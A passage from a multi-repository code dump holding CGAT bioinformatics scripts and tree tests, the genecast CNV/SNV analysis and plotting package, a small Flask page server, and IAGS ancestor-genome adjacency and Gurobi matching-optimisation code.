key2 = prefix % (b, a)
if key1 in open_files or os.path.exists(key1):
key = key1
else:
key = key2
if key not in open_files:
open_files[key] = open(key, "a")
f = open_files[key]
f.write(line)
f.flush()
def main(argv=None):
"""script main.
parses command line options in sys.argv, unless *argv* is given.
"""
if argv is None:
argv = sys.argv
parser = E.OptionParser(
version="%prog version: $Id: split_links.py 2781 2009-09-10 11:33:14Z andreas $")
parser.add_option("-m", "--method", dest="method", type="string",
help="method for splitting.")
parser.add_option("-r", "--regex", dest="regex", type="string",
help="regex to find prefix.")
parser.add_option("-o", "--output-section", dest="output", type="string",
help="output filename.")
parser.add_option("-t", "--targets", dest="targets", type="string",
help="output filename.")
parser.set_defaults()
(options, args) = E.Start(parser)
if options.targets:
options.targets = options.targets.split(",")
nsame = 0
ndiff = 0
if options.method == "prefix":
for line in sys.stdin:
if line[0] == "#":
continue
data = line[:-1].split("\t")
g1 = re.search(options.regex, data[0]).groups()[0]
g2 = re.search(options.regex, data[1]).groups()[0]
if g1 == g2:
for t in options.targets:
if g1 == t:
continue
WriteLine(g1, t, line, options.output)
nsame += 1
else:
WriteLine(g1, g2, line, options.output)
ndiff += 1
print "nsame=%i, ndiff=%i" % (nsame, ndiff)
E.Stop()
if __name__ == "__main__":
sys.exit(main(sys.argv))
```
#### File: cgat/scripts/table2graph.py
```python
import sys
import CGAT.Experiment as E
def main(argv=None):
"""script main.
parses command line options in sys.argv, unless *argv* is given.
"""
if not argv:
argv = sys.argv
# setup command line parser
parser = E.OptionParser(
version="%prog version: $Id$", usage=globals()["__doc__"])
parser.add_option(
"-e", "--header-names", dest="headers", type="string",
help="',' separated list of node headers [default=%default].")
parser.set_defaults(
headers="node1,node2",
)
# add common options (-h/--help, ...) and parse command line
(options, args) = E.Start(parser, argv=argv)
# do sth
ninput, nskipped, noutput = 0, 0, 0
first = True
for line in options.stdin:
if line.startswith("#"):
continue
data = line[:-1].split("\t")
if first:
headers = options.headers.split(",")
if len(data) >= 2:
extra = "\t%s" % ("\t".join(data[2:]))
else:
extra = ""
options.stdout.write("%s%s\n" % ("\t".join(headers), extra))
first = False
continue
ninput += 1
if len(data) < 2:
continue
values = [x.split(";") for x in data[1:] if x != ""]
if len(values) == 0:
nskipped += 1
continue
l = min([len(x) for x in values])
assert l == max(
[len(x) for x in values]), "unequal number of fields in line '%s'" % line[:-1]
node1 = [[data[0]] * l]
for n in zip(*(node1 + values)):
options.stdout.write("\t".join(n) + "\n")
noutput += 1
E.info("ninput=%i, noutput=%i, nskipped=%i" % (ninput, noutput, nskipped))
# write footer and output benchmark information.
E.Stop()
if __name__ == "__main__":
sys.exit(main(sys.argv))
```
#### File: cgat/tests/Tree_test.py
```python
from CGAT.Tree import Tree
import unittest
class MidPointRootingCheck(unittest.TestCase):
trees = [
"(A:1,((B:1,C:1):1,D:1):1,(E:1,F:1):1);",
"((A:1,(B:1,C:1):1):0.5,((D:1,E:1):1,F:1):0.5);",
"(A:1,B:1);",
"((A:1,B:1):1,C:5);",
"((A:1,B:1):10,(D:1,C:5):1);",
"((A:0,B:0):1,(D:0,C:5):0);",
"((A:5,B:1):1,D:1);",
"((A:0,(B:0,(((C:0,D:0):0,E:2.11270):0,((F:0,G:0):0,(H:0,I:0):0):0):0):0):0,((J:0,K:0.12496):0,L:0):0,M:0);",
"(ID000001:1.19640,(((ID000004:0.41850,ID000006:0.06490):0.12010,ID000005:0.30820):0.31570,ID000003:0.38540):0.00000,ID000002:1.27200);",
"(A:0.19174,(B:0.58034,((C:0.98961,D:0.52099):0.14598,(E:0.00000,F:0.00000):0.49107):0.67347):0.01248,G:0.34146);",
"(((((A:0.10670,B:0.35050):0.03480,C:0.13720):0.23850,D:0.31120):0.12570,E:0.38110):0.04180,F:0.79130);",
"(ID000001:0.83310,(((ID000005:0.10670,ID000004:0.35050):0.03480,ID000006:0.13720):0.23850,ID000003:0.31120):0.12570,ID000002:0.38110);",
]
def testLength(self):
"""midpoint rooting."""
for tree in self.trees:
t = Tree(tree)
t.root_midpoint()
# test 1: only two children for root
s = t.node(t.root).succ
self.assertEqual(len(s), 2)
# calculate tree length on either side of tree
d2leaves = [0] * (max(t.chain.keys()) + 1)
def dist2leaves(node_id):
node = t.node(node_id)
if node.succ:
d2leaves[node_id] = max(
[d2leaves[s] + t.node(s).data.branchlength for s in node.succ])
t.dfs(t.root, post_function=dist2leaves)
d1 = d2leaves[s[0]] + t.node(s[0]).data.branchlength
d2 = d2leaves[s[1]] + t.node(s[1]).data.branchlength
# test 2: distance to children equal on both sides
self.assertAlmostEqual(d1, d2, 5,
"assertion error: %s != %s for tree %s -> %s" %
(str(d1), str(d2),
tree, t.to_string(branchlengths_only=True)))
def testNegativeBranchLengths(self):
for tree in self.trees:
t = Tree(tree)
t.root_midpoint()
for n, node in t.chain.items():
self.failIf(node.data.branchlength < 0,
"assertion error: negative branchlength for tree %s -> %s" %
(tree, t.to_string(branchlengths_only=True)))
def testTruncate(self):
t = Tree("(A:1,((B:1,C:1):1,D:1):1,(E:1,F:1):1);")
t.truncate(7, "E+F")
result = t.to_string(branchlengths_only=True,
branchlength_format="%i",
format="nh")
self.assertEqual(result, "(A:1,((B:1,C:1):1,D:1):1,E+F:1);")
t = Tree("(A:1,((B:1,C:1):1,D:1):1,(E:1,F:1):1);")
t.truncate(8)
result = t.to_string(branchlengths_only=True,
branchlength_format="%i",
format="nh")
self.assertEqual(result, "(A:1,((B:1,C:1):1,D:1):1,F:1);")
if __name__ == "__main__":
unittest.main()
``` |
{
"source": "861934367/genecast",
"score": 2
} |
#### File: lib/genecast_package/core.py
```python
import matplotlib as mpl
mpl.use('Agg')
import warnings
warnings.filterwarnings("ignore")
import itertools
import seaborn as sns
import matplotlib.pylab as plt
import matplotlib.colors as mc
from genecast_package.svm_analysis import feature_select, evaluate_model
from sklearn.decomposition import PCA
from collections import OrderedDict
from collections import defaultdict
import datetime
import pandas as pd
import os
import sh
import warnings
warnings.filterwarnings("ignore")
def z_score(data, axis):
if axis == 1:
z_scored = data
else:
z_scored = data.T
z_scored = (z_scored - z_scored.mean()) / z_scored.std()
if axis == 1:
return z_scored
else:
return z_scored.T
def pheatmap(data, length, col_cluster=True, xticklabels=True, yticklabels=True, save="pdf", color=None, name=None):
data = z_score(data, axis=0)
if len(data.columns) > 30:
xticklabels = False
if len(data) > 80:
yticklabels = False
vmin, vmax = data.unstack().quantile([.01, .99])
re = sns.clustermap(data, cmap="bwr", row_cluster=True, col_cluster=col_cluster, figsize=(13, 10), \
xticklabels=True, yticklabels=yticklabels, vmin=vmin, vmax=vmax, col_colors=color)
re.ax_heatmap.set_xticklabels(re.ax_heatmap.xaxis.get_majorticklabels(), rotation=90)
re.ax_heatmap.set_yticklabels(re.ax_heatmap.yaxis.get_majorticklabels(), rotation=0)
if col_cluster == False:
for group, number in length.items():
re.ax_col_colors.text((number[0] + number[1])/2 - len(group)/2, 1.1, group, size=30)
re.savefig(name + "." + save)
else:
re.savefig(name + "_col_cluster." + save)
plt.close()
def make_col_color_heatmap(group_dic):
common_color = ["blue", "red", "green", "grey"]
color = {}; length = {}
temp = 0
i = 0
for name, group in group_dic.items():
length[name] = [temp, temp + len(group)]
temp += len(group)
for sample in group:
color[sample] = common_color[i]
i += 1
color = pd.Series(color)
color.name = "group"
return color, length
def pca(data, group_dic, n=None):
pca = PCA(n_components=2)
group = []
length = OrderedDict()
temp = 0
for name, g in group_dic.items():
length[name] = [temp, temp + len(g)]
temp += len(g)
group += g
data = data[group]
newData = pca.fit_transform(data.T)
colors = ["blue", "red", "green", 'turquoise', "grey"]
i = 0
for name, number in length.items():
plt.scatter(newData[number[0]:number[1], 0], newData[number[0]:number[1], 1], label=name, color=colors[i])
i += 1
plt.title("PCA analysis")
pc1 = 100*pca.explained_variance_ratio_[0]
pc2 = 100*pca.explained_variance_ratio_[1]
plt.xlabel("PC1(%.1f)" % pc1)
plt.ylabel("PC1(%.1f)" % pc2)
plt.legend()
plt.savefig("PCA_%s.png" % n)
plt.close()
def plot_box(data, which, outname, palette, regulation, group):
fig, ax1 = plt.subplots(figsize=(8,12))
box_data = defaultdict(list)
if which == "cnv":
how = "mean"
for name, g in group.items():
box_data[name] = data[g].mean(0)
else:
how = "sum"
for name, g in group.items():
box_data[name] = data[g].sum(0)
data.to_csv(outname + "_box_data_%s_%s" % (regulation, how) + ".txt", sep="\t")
sns.boxplot(data=pd.DataFrame(box_data), ax=ax1, width=0.2, linewidth=.5, palette=palette)
ax1.set_title(outname)
ax1.set_ylabel('%s value(%s)' % (which, how))
fig.autofmt_xdate(ha='center', rotation=0)
fig.savefig(r'%s_box_data_%s_%s_Boxplot.png' % (outname, regulation, how), dpi=600, size=0.5)
plt.close()
def databox(raw, which, outname=None, group=None):
palette = {}
up = []; down = []
group1_data = raw[list(group.values())[0]]
group2_data = raw[list(group.values())[1]]
color = ["red", "green", "blue"]
for gene in raw.index:
if group1_data.ix[gene].sum() - group2_data.ix[gene].sum() >= 0:
up.append(gene)
else:
down.append(gene)
for i, (name, g) in enumerate(group.items()):
palette[name] = color[i]
plot_box(raw.ix[up], which, outname, palette, "up", group)
plot_box(raw.ix[down], which, outname, palette, "down", group)
def save_data_pdf(data, name, length, color, group_dic, which):
data.to_csv("%s.txt" % name, sep="\t")
length = {key.split("/")[-1]: value for key, value in length.items()}
group_dic = {key.split("/")[-1]: value for key, value in group_dic.items()}
pheatmap(data, length, col_cluster=True, color=color, name=name, save="png")
pheatmap(data, length, col_cluster=False, color=color, name=name, save="png")
pca(data, group_dic, n=name)
databox(data, which, outname=name, group=group_dic)
def save_parameters(args=None, which="cnv"):
pass
def make_result_folder(args=None, which="cnv", fun=None):
feature_genes = []; gene_lists = {}; color_length = {}
os.chdir(args.outdir)
i = datetime.datetime.now()
for two_group in itertools.combinations([args.group1, args.group2], 2):
target = two_group[0].split("/")[-1] + "_VS_" + two_group[1].split("/")[-1] + "_%s%s%s_%s%s" % (i.year, i.month, i.day, i.hour, i.minute)
try:
os.mkdir(target)
except FileExistsError:
sh.rm("-rf",target)
os.mkdir(target)
if which == "cnv":
name = "cnv_median_" + args.data_type
gene_list, a_group, b_group = fun(args.host_gene, two_group[0], two_group[1], data_type=args.data_type)
else:
if args.cal_type == "num":
name = "snv_number"
else:
name = "snv_mean"
gene_list, a_group, b_group = fun(args.host_gene, two_group[0], two_group[1], args.cal_type, which)
feature_gene = feature_select(gene_list, a_group, b_group, pval=args.pval, method=args.feature_selection_method,\
criterion=args.criterion, penalty=args.penalty, C=args.C, threshold=args.threshold)
feature_genes.append(feature_gene)
gene_lists[two_group[0]] = gene_list[a_group]; gene_lists[two_group[1]] = gene_list[b_group]
os.chdir(target)
save_parameters(args=args, which=which)
group_dic = {two_group[0]: a_group, two_group[1]: b_group}
color_length[two_group[0]] = a_group; color_length[two_group[1]] = b_group
color, length = make_col_color_heatmap(group_dic)
save_data_pdf(gene_list, "host_gene_%s" % name, length, color, group_dic, which)
pd.DataFrame({"gene":feature_gene}).to_csv("feature_gene_pval%0.2f.txt" % args.pval, sep="\t", index=False)
feature_gene_cnv = gene_list.ix[feature_gene]
evaluate_model(gene_list, a_group, b_group, feature_gene, name="feature_gene_%s" % name, method=args.prediction_method, C=args.C, n_folds=args.n_folds)
save_data_pdf(feature_gene_cnv, "feature_gene_%s" % name, length, color, group_dic, which)
os.chdir(args.outdir)
if len([args.group1, args.group2]) > 2:
try:
os.mkdir("intersection")
except FileExistsError:
pass
os.chdir("intersection")
color, length = make_col_color_heatmap(color_length)
intersection_feature_gene = list(set(feature_genes[0]).intersection(*feature_genes[1:]))
intersection_feature_gene_cnv = pd.concat([data.ix[intersection_feature_gene] for [args.group1, args.group2], data in gene_lists.items()], axis=1)
try:
save_data_pdf(intersection_feature_gene_cnv, "intersection", length, color, color_length)
except Exception:
print("no intersection\njob finish...")
os.chdir(args.outdir)
```
#### File: genecast/genecast_package/cnv_analysis.py
```python
import pandas as pd
from glob import glob
import numpy as np
import os
from genecast_package.core import make_result_folder
from genecast_package.snv_analysis import get_host_gene
import warnings
warnings.filterwarnings("ignore")
class MethodException(Exception):
pass
def split_gene_data(data, data_type):
new_data = {"gene": [], data_type: []}
for genes, value in zip(data["gene"], data[data_type]):
for gene in genes.split(";"):
new_data["gene"].append(gene)
new_data[data_type].append(value)
data = pd.DataFrame(new_data)
return data
def parser_cnr(file, args=None):
data = pd.read_table(file, usecols=["gene", "log2"])
data = data.loc[data["gene"] != "Background"]
data = split_gene_data(data, args.data_type)
groups = pd.DataFrame(data.groupby(data["gene"]).median())
groups.columns = [file.split("/")[-1].split(".")[0]]
return groups
def parser_call_cnr(file, args=None):
data = pd.read_table(file, usecols=["gene", "log2", "cn"])
data = data.loc[data["gene"] != "Background"]
data = split_gene_data(data, args.data_type)
groups = pd.DataFrame(data[args.data_type].groupby(data["gene"]).median())
groups.columns = [file.split("/")[-1].split(".")[0]]
return groups
def get_host_gene_cnv(args=None):
gene_list = get_host_gene(args=args)
if args.data_type == "log2": fun = parser_cnr; fillna_num = 0
else: fun = parser_call_cnr; fillna_num = 2
a_group = []
for file in args.group1:
a_group.append(file.split("/")[-1].split(".")[0])
gene_list = pd.merge(gene_list, fun(file, args=args), left_on="gene", right_index=True, how="left").fillna(fillna_num)
b_group = []
for file in args.group2:
b_group.append(file.split("/")[-1].split(".")[0])
gene_list = pd.merge(gene_list, fun(file, args=args), left_on="gene", right_index=True, how="left").fillna(fillna_num)
gene_list.index = gene_list["gene"]
del gene_list["gene"]
# if 0 in gene_list.dropna(how="all").fillna(0):
# data = gene_list.dropna(how="all").fillna(0).drop(0, axis=0)
# else:
# data = gene_list.dropna(how="all").fillna(0)
if args.data_type == "log2": data = gene_list.loc[~(gene_list.T==0).all()]
else: data = gene_list.loc[~(gene_list.T==2).all()]
return data, a_group, b_group
def cnv(args=None):
make_result_folder(args=args, fun=get_host_gene_cnv, which="cnv")
if __name__ == "__main__":
host_gene_file = "target_gene.txt"
groups = ["CESC", "OV", "UCEC"]
p = 0.05
root_dir = os.getcwd()
make_result_folder(host_gene_file, groups, p, root_dir, fun=get_host_gene_cnv, which="cnv", \
prediction_method="LinearSVC", C=1, n_folds=5, criterion='aic', penalty="l2", alpha=0.025, threshold=0)
```
#### File: genecast/genecast_package/depth_coverage_plot.py
```python
import matplotlib as mpl
mpl.use('Agg')
import matplotlib.pyplot as plt
import seaborn as sns
import pandas as pd
import numpy as np
import multiprocessing
import sh
import pysam
from collections import defaultdict
class TypeException(Exception):
pass
def bin(group, n):
depth = []
group = np.array(group)
for i in range(0, len(group), n):
depth.append(np.median(group[i:i + n]))
return np.log10(depth)
def plot(data, args=None, file=None):
fig, axs = plt.subplots(nrows=2, ncols=1,figsize=(15,12))
average_depth = data[args.type].mean()
percentage20 = len(data.loc[data[args.type] > average_depth * 0.2]) / len(data)
if args.type == "base": reads = bin(data[args.type], args.n)
else: reads = np.log10(data[args.type])
ax1, ax2 = axs[0], axs[1]
ax1.bar(np.arange(len(reads)), reads, 1, color="slateblue")
ax1.set_ylabel("$Log10(%s)$" % args.type, size=20)
#ax1.set_title("Uniformity of Coverage (Average Coverage = %d)" % (average_depth), size=20)
reads.sort()
ax2.bar(np.arange(len(reads)), reads, 1, color="slateblue")
ax2.set_ylabel("$Log10(%s)$" % args.type, size=20)
ax2.set_xticks([])
if args.type == "base":
ax1.set_xlabel("panel_loction(bin=%d)" % args.n, size=20)
ax2.set_xlabel("sort_depth(bin=%d)" % args.n, size=20)
ax1.set_title("Uniformity of Coverage (Average Coverage = %d percentage20 = %0.3f)" % (average_depth, percentage20), size=20)
else:
ax1.set_xlabel("panel_loction(bin=panel_region)", size=20)
ax2.set_xlabel("sort_depth(bin=panel_region)", size=20)
ax1.set_title("Uniformity of Coverage (Average reads of panel_region = %d percentage20 = %0.3f)" % (average_depth, percentage20), size=20)
plt.subplots_adjust(left=0.1, bottom=0.1, right=0.9, top=0.9, hspace = 0.2, wspace = 0.3)
plt.savefig("%s_uniformity_coverage.png" % file.split(".")[0], dpi=600)
plt.close()
def multiprocessing_plot(file, args):
if args.type == "reads":
sam = pysam.AlignmentFile(file)
data = pd.read_table("%s" % args.panel, names=["chr", "start", "end", "gene", "transcript"])
data["reads"] = [sam.count(chr, start, end) / (end - start) for chr, start, end in zip(data["chr"], data["start"], data["end"])]
elif args.type == "base":
try:
data = pd.read_table(file.strip(".") + ".depth", names=["chr", "pos", "base"])
except:
re = sh.samtools("depth", file, "-b", "%s" % args.panel)
f = open(file.strip(".") + ".depth", "wb")
f.write(re.stdout); f.close()
data = pd.read_table(file.strip(".") + ".depth", names=["chr", "pos", "base"])
else:
raise TypeException("data type is wrong")
plot(data, args=args, file=file)
return np.log10(data[args.type])
def plot_coverage(args=None):
pool = multiprocessing.Pool(processes=args.progress)
box_data = {}
for file in args.bams:
box_data[file.split(".")[0]] = pool.apply_async(multiprocessing_plot, (file, args))
pool.close(); pool.join()
box_data = {key: value.get() for key, value in box_data.items()}
data = pd.DataFrame(box_data)
fig, ax1 = plt.subplots(figsize=(len(args.bams), 12))
sns.boxplot(data=data, ax=ax1, width=0.2, linewidth=.5)
ax1.set_title("Uniformity of Coverage")
ax1.set_ylabel("$Log10(%s)$" % args.type)
fig.autofmt_xdate(ha='center', rotation=0)
plt.xticks(rotation=90)
fig.savefig(r'%s_Uniformity_Boxplot.png' % (args.out), dpi=600)
plt.close()
``` |
{
"source": "863aditya/NEAR_DUPLICATE_DETECTION",
"score": 3
} |
#### File: ndd_1/flask/app.py
```python
from flask import Flask
from flask import render_template,request,redirect
app = Flask(__name__)
@app.route("/")
def root():
return render_template("p1.html")
@app.route("/p11")
def p11():
return render_template("p11.html")
@app.route("/p12")
def p12():
return render_template("p12.html")
@app.route("/p13")
def p13():
return render_template("p13.html")
@app.route("/p14")
def p14():
return render_template("p14.html")
@app.route("/p15")
def p15():
return render_template("p15.html")
@app.route("/p16")
def p16():
return render_template("p16.html")
@app.route("/p17")
def p17():
return render_template("p17.html")
@app.route("/p18")
def p18():
return render_template("p18.html")
@app.route("/p19")
def p19():
return render_template("p19.html")
@app.route("/p110")
def p110():
return render_template("p110.html")
@app.route("/p111")
def p111():
return render_template("p111.html")
@app.route("/p112")
def p112():
return render_template("p112.html")
if __name__=="__main__":
app.run(debug=True,port=5000)
``` |
{
"source": "865699871/IAGS_version1.0",
"score": 3
} |
#### File: IAGS_version1.0/dataSturcture/adjacencyMatrix.py
```python
import pandas as pd
import numpy as np
class AdjacencyMatrix:
def __init__(self):
self.adjacency_matrix =None
def readFromMatrix(self,adjacency_matrix):
self.adjacency_matrix = adjacency_matrix
def readFromFile(self,file):
self.adjacency_matrix = pd.read_csv(file, sep='\t', index_col=0,dtype=int)
def output(self,outfile):
self.adjacency_matrix.to_csv(outfile, sep='\t')
def __reverse(self,item):
if item[-1] == 'a':
return item[:-1] + 'b'
else:
return item[:-1] + 'a'
def assemble(self):
index = self.adjacency_matrix.index.tolist()
columns =self.adjacency_matrix.columns.tolist()
np_adjacency_matrix = np.asarray(self.adjacency_matrix)
adjacencies = {}
for i in range(len(index)):
for j in range(len(index)):
if round(np_adjacency_matrix[i][j]) == 1:
if '$' == index[i] or '$' == index[j]:
continue
pair = sorted([index[i], index[j]])
key = pair[0] + '@' + pair[1]
if key not in adjacencies.keys():
adjacencies[key] = 1
else:
adjacencies[key] += 1
adjs = {}
for i in adjacencies.keys():
itemset = i.split('@')
if itemset[0] not in adjs.keys():
adjs[itemset[0]] = itemset[1]
if itemset[1] not in adjs.keys():
adjs[itemset[1]] = itemset[0]
startpoint = []
for j in range(len(columns)):
if np_adjacency_matrix[0][j] == 1:
startpoint.append(columns[j])
markerstartpoint = []
self.chr = []
for i in startpoint:
if i not in markerstartpoint:
path = []
if i[-1] == 'a':
path.append(i[:-1])
else:
path.append('-' + i[:-1])
start = self.__reverse(i)
if start in startpoint:
markerstartpoint.append(start)
self.chr.append(path)
else:
while True:
next = adjs[start]
if next[-1] == 'a':
path.append(next[:-1])
else:
path.append('-' + next[:-1])
start = self.__reverse(next)
if start in startpoint:
markerstartpoint.append(start)
break
self.chr.append(path)
vector = []
for i in self.chr:
for j in i:
if j.startswith('-'):
vector.append(j[1:])
else:
vector.append(j)
cyclepoint = []
for i in adjs.keys():
if i[:-1] not in vector:
cyclepoint.append(i)
self.cyclechr = []
markercycle = []
for i in cyclepoint:
if i not in markercycle:
startpoint = i
cycle = []
markercycle.append(i)
start = i
while True:
next = adjs[start]
if next[-1] == 'a':
cycle.append(next[:-1])
else:
cycle.append('-' + next[:-1])
markercycle.append(start)
markercycle.append(next)
start = self.__reverse(next)
if start == startpoint:
break
self.cyclechr.append(cycle)
return self.chr,self.cyclechr
def out_assembly(self,outfile,remove_bar):
outfile = open(outfile, 'w')
print("string:"+str(len(self.chr)))
for i in self.chr:
outfile.write('s ')
for j in i:
if remove_bar:
block = j.split('_')[0]
outfile.write(block+' ')
else:
outfile.write(j + ' ')
outfile.write('\n')
print("cycle:"+str(len(self.cyclechr)))
for k in self.cyclechr:
outfile.write('c ')
min_index = -1
min_value = 1000000
for l in range(len(k)):
if k[l].startswith('-'):
item = k[l][1:].split('_')
block = int(item[0])
else:
item = k[l].split('_')
block = int(item[0])
if block < min_value:
min_index = l
min_value = block
if k[min_index].startswith('-'):
half1 = k[min_index + 1:]
half2 = k[:min_index + 1]
new_string = half1 + half2
else:
half1 = k[min_index:]
half2 = k[:min_index]
new_string = half1 + half2
for l in new_string:
if remove_bar:
block = l.split('_')[0]
outfile.write(block + ' ')
else:
outfile.write(l + ' ')
outfile.write('\n')
outfile.close()
```
#### File: IAGS_version1.0/inferringAncestorGenomeStructure/EndpointMatchingOptimization.py
```python
import gurobipy as gp
from gurobipy import *
import pandas as pd
import numpy as np
from dataSturcture.adjacencyMatrix import AdjacencyMatrix
class EndpointMatchingOptimization:
def __init__(self,ancestor_file,guided_file,matching_dim1 = 4,matching_dim2 = 2,relation1 = 1,relation2 = 2,relabel=False):
self.__matching_dim1 = matching_dim1
self.__matching_dim2 = matching_dim2
self.__relation1 = relation1
self.__relation2 = relation2
self.__relabel_block_sequences = []
self.__relabel = relabel
ancestor_matrix = pd.read_csv(ancestor_file,sep='\t',index_col=0)
self.__ancestor_adjacency_list = self.__build_adjacency_list(ancestor_matrix)
self.__candidate_compress_adjacency_matrix, self.__candidate_endpoint_list = \
self.__build_assumed_matrix(self.__ancestor_adjacency_list)
if self.__relabel:
self.__guided_adjacency_list = self.__assumed_block_label(guided_file)
else:
self.__guided_adjacency_list = self.__build_adjacency_list_from_sequence(guided_file)
self.__guided_compress_adjacency_matrix, self.__guided_endpoint_list = \
self.__build_assumed_matrix(self.__guided_adjacency_list)
self.__match_pairs = []
for i in self.__candidate_compress_adjacency_matrix:
match_pair = []
adj1 = i[-1]
compare_key1 = ''
if adj1[0] != '$':
item = adj1[0].split('@')
compare_key1 += item[0]
if adj1[1] != '$':
item = adj1[1].split('@')
compare_key1 += item[0]
for j in self.__guided_compress_adjacency_matrix:
adj2 = j[-1]
compare_key2 = ''
if adj2[0] != '$':
item = adj2[0].split('@')
compare_key2 += item[0]
if adj2[1] != '$':
item = adj2[1].split('@')
compare_key2 += item[0]
if compare_key1 == compare_key2:
match_pair.append(j)
self.__match_pairs.append([i, match_pair])
self.__k = int((len(self.__candidate_endpoint_list) - 1) / (self.__matching_dim1))
def optimization(self):
try:
self.__m = gp.Model()
match_matrix = self.__m.addVars(self.__k,
self.__matching_dim1,
self.__matching_dim2,
vtype=GRB.BINARY,
name="matching_matrix")
self.__m.update()
self.__m.setObjective(gp.quicksum(
(i[0][2] * match_matrix[int(i[0][0] / (self.__matching_dim1)),
i[0][0] % self.__matching_dim1,
j[0] % self.__matching_dim2] + (1 - i[0][2])) *
(i[0][3] * match_matrix[int(i[0][1] / (self.__matching_dim1)),
i[0][1] % self.__matching_dim1,
j[1] % self.__matching_dim2] + 1 - i[0][3])
for i in self.__match_pairs for j in i[1]
), GRB.MAXIMIZE)
self.__m.addConstrs((
gp.quicksum(match_matrix[i, j, l] for l in range(self.__matching_dim2)) == self.__relation1
for i in range(self.__k)
for j in range(self.__matching_dim1)), name='row_unique'
)
self.__m.addConstrs((
gp.quicksum(match_matrix[i, l, j] for l in range(self.__matching_dim1)) == self.__relation2
for i in range(self.__k)
for j in range(self.__matching_dim2)), name='col_unique'
)
self.__m.optimize()
print('Obj: %g' % self.__m.objVal)
except gp.GurobiError as e:
print('Error code ' + str(e.errno) + ': ' + str(e))
except AttributeError:
print('Encountered an attribute error')
def matching_relation(self):
result = []
for v in self.__m.getVars():
result.append(v.x)
result = np.asarray(result)
result = result.reshape((self.__k, self.__matching_dim1, self.__matching_dim2))
self.__match_relations = {}
for i in range(len(result)):
column = []
index = []
for j in range(self.__matching_dim2):
item = self.__candidate_endpoint_list[i * self.__matching_dim2 + 1].split('@')
column.append(item[0] + '@' + str(j + 1))
for j in range(self.__matching_dim1):
item = self.__candidate_endpoint_list[i * self.__matching_dim2 + 1].split('@')
index.append(item[0] + '@' + str(j + 1))
match = pd.DataFrame(result[i], columns=column, index=index)
match_relation = match.to_dict()
for j in match_relation.keys():
for k in match_relation[j].keys():
item = k.split('@')
if match_relation[j][k] == 1:
self.__match_relations[k] = j
def output_matching_relation(self,outfile):
outfile = open(outfile, 'w')
for i in self.__match_relations.keys():
line = i + ' ' + self.__match_relations[i]
line += '\n'
outfile.write(line)
outfile.close()
def build_adjacency_matrix(self):
new_adjacency_list = []
for i in self.__ancestor_adjacency_list:
new_adjacency = []
for j in i:
if j == '$':
new_adjacency.append('$')
else:
new_adjacency.append(self.__match_relations[j])
new_adjacency_list.append(new_adjacency)
new_result_Matrix = {}
for i in self.__candidate_endpoint_list:
if i == '$':
key1 = '$'
else:
item1 = i.split('@')
key1 = item1[0][:-1] + '_' + item1[1] + item1[0][-1]
new_result_Matrix[key1] = {}
for j in self.__candidate_endpoint_list:
if j == '$':
key2 = '$'
else:
item2 = j.split('@')
key2 = item2[0][:-1] + '_' + item2[1] + item2[0][-1]
new_result_Matrix[key1][key2] = 0
for i in new_adjacency_list:
if i[0] == '$':
key1 = '$'
else:
item1 = i[0].split('@')
key1 = item1[0][:-1] + '_' + item1[1] + item1[0][-1]
if i[1] == '$':
key2 = '$'
else:
item2 = i[1].split('@')
key2 = item2[0][:-1] + '_' + item2[1] + item2[0][-1]
new_result_Matrix[key1][key2] = 1
new_result_Matrix[key2][key1] = 1
new_result_Matrix = pd.DataFrame(new_result_Matrix)
self.adjacency_matrix = AdjacencyMatrix()
self.adjacency_matrix.readFromMatrix(new_result_Matrix)
return self.adjacency_matrix
def __build_adjacency_list(self,ancestor_matrix):
blocks_index = ancestor_matrix.columns.tolist()
blocks_matrix = np.asarray(ancestor_matrix)
endpoint_count = {}
for i in blocks_index:
endpoint_count[i] = 1
process_adjacency = []
adjacency_list = []
for i in range(len(blocks_matrix)):
for j in range(len(blocks_matrix[i])):
pair1 = blocks_index[i]
pair2 = blocks_index[j]
key = [pair1, pair2]
key = sorted(key)
key = key[0] + '@' + key[1]
if key not in process_adjacency:
process_adjacency.append(key)
else:
continue
if round(blocks_matrix[i][j]) != 0:
for k in range(int(round(blocks_matrix[i][j]))):
if pair1 == '$' and pair2 == '$':
adjacency_list.append([pair1, pair2])
elif pair1 == '$' and pair2 != '$':
adjacency_list.append([pair1, pair2 +'@'+ str(endpoint_count[pair2])])
endpoint_count[pair2] += 1
elif pair1 != '$' and pair2 == '$':
adjacency_list.append([pair1 +'@'+ str(endpoint_count[pair1]), pair2])
endpoint_count[pair1] += 1
else:
adjacency_list.append(
[pair1 +'@'+ str(endpoint_count[pair1]), pair2 +'@'+ str(endpoint_count[pair2])])
endpoint_count[pair1] += 1
endpoint_count[pair2] += 1
return adjacency_list
def __build_adjacency_list_from_sequence(self,file):
adjacency_list = []
with open(file,'r') as df:
while True:
line = df.readline()[:-2]
if not line:
break
itemset = line.split(' ')
chr_type = itemset[0]
new_block_order = itemset[1:]
last = ''
start = ''
for i in range(len(new_block_order)):
if i == 0:
if chr_type == 's':
if new_block_order[i].startswith('-'):
block = new_block_order[i][1:].split('_')[0]
copy_number = new_block_order[i][1:].split('_')[1]
adjacency_list.append(['$', block + 'b' + '@' + copy_number])
last = block + 'a' + '@' + copy_number
else:
block = new_block_order[i].split('_')[0]
copy_number = new_block_order[i].split('_')[1]
adjacency_list.append(['$', block + 'a' + '@' + copy_number])
last = block + 'b' + '@' + copy_number
else:
if new_block_order[i].startswith('-'):
block = new_block_order[i][1:].split('_')[0]
copy_number = new_block_order[i][1:].split('_')[1]
last = block + 'a' + '@' + copy_number
start = block + 'b' + '@' + copy_number
else:
block = new_block_order[i].split('_')[0]
copy_number = new_block_order[i].split('_')[1]
last = block + 'b' + '@' + copy_number
start = block + 'a' + '@' + copy_number
else:
if new_block_order[i].startswith('-'):
block = new_block_order[i][1:].split('_')[0]
copy_number = new_block_order[i][1:].split('_')[1]
adjacency_list.append([last, block + 'b' + '@' + copy_number])
last = block + 'a' + '@' + copy_number
else:
block = new_block_order[i].split('_')[0]
copy_number = new_block_order[i].split('_')[1]
adjacency_list.append([last, block + 'a' + '@' + copy_number])
last = block + 'b' + '@' + copy_number
if chr_type == 's':
adjacency_list.append([last, '$'])
else:
adjacency_list.append([last, start])
return adjacency_list
def __assumed_block_label(self,file):
adjacency_list = []
block_objects = {}
relabel_block_order = []
with open(file) as df:
while True:
line = df.readline()[:-2]
if not line:
break
itemset = line.split(' ')
chr_type = itemset[0]
new_block_order = []
for i in itemset[1:]:
block = ''
if i.startswith('-'):
block = i[1:]
if block not in block_objects.keys():
block_objects[block] = 1
new_block = '-' + block + '_' + str(block_objects[block])
block_objects[block] += 1
else:
